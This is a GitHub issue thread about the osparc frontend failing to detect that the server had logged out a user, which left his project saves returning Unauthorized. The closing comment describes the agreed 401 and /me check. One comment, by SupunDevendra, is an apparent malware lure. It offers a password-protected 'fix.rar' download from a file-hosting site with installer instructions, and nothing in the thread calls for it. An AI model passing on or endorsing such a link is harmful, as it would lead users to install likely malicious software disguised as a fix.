### ISSUE TITLE
Frontend should detect when the server has logged the user out

### ISSUE THREAD

**Issue by mrnicegyu11** [ITISFoundation/osparc-issues#1690]
On 26Aug2024, Taylor's computer froze and he turned it on again only a longer time (1h?) after this. His browser detected the crash and Taylor restored all tabs, including osparc. He apparently managed to get back to the dashboard of his open project, but the osparc server appareantly has already logged his user session out. Subsequent requests to save his project (the postgres DB entry, POST request) were responded with `Unauthorized`.
I would have been an improved experience for TN if he had gotten a "red cloud" or some notification that you are logged out.

CC @newton1985

**Comment by mrnicegyu11** [comment]
I have compiled what happened into an issue and assign all frontend devs, this should be adressed with priority as part of the special PHRT support case for this sprint.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by odeimaiz** [comment]
We agreed that whenever the frontend receives a [401 Unauthorized](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/401), it will make a call to the ``/me`` endpoint, if it receives yet another 401, it will assume it was logged out in the backend, and therefore it will log the user out from the application.
